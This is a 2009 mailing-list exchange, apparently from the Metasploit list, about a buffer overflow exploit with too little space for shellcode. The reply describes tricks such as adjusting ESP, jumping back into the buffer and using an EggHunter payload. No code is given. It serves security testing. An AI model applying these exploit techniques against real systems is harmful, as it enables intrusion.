No room for shellcode

[allendb760 at googlemail.com (DB Allen)]

Thanks for the help guys, much appreciated - I'll try adjusting ESP and see
if that helps any - will also give the EggHunter method a go too, not tried
that before.

Out of interest, has anyone ever seen an overflow fail when changing
shellcode. As in the buffer overflow doesn't even occur..

I thought there may be a bad character in the shellcode, which was why it
was not landing up in the stack properly, so generated new shellcode set to
exclude the byte I thought could be causing problems, and the overflow
didn't even occur, was sending exactly the same data for the initial buffer,
just different shellcode... It's irritated the hell outta me!

Thanks,

DB




On Sun, May 3, 2009 at 10:59 AM, Patrick Webster <patrick at aushack.com>wrote:

> Yeah try adjusting ESP first...
>
> Otherwise you can use either the existing jmp esp return address to hit
> your nops, but instead swap the nops for a jump backwards to the start of
> the 'A's (5 bytes), or use the EggHunter payload (about 32 bytes) which will
> search the process space for the payload & execute it...
>
> As a reference, I used this for the Ximati http server module due to
> similar space issues.
>
> -Patrick
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://mail.metasploit.com/pipermail/framework/attachments/20090503/af6415d0/attachment.htm>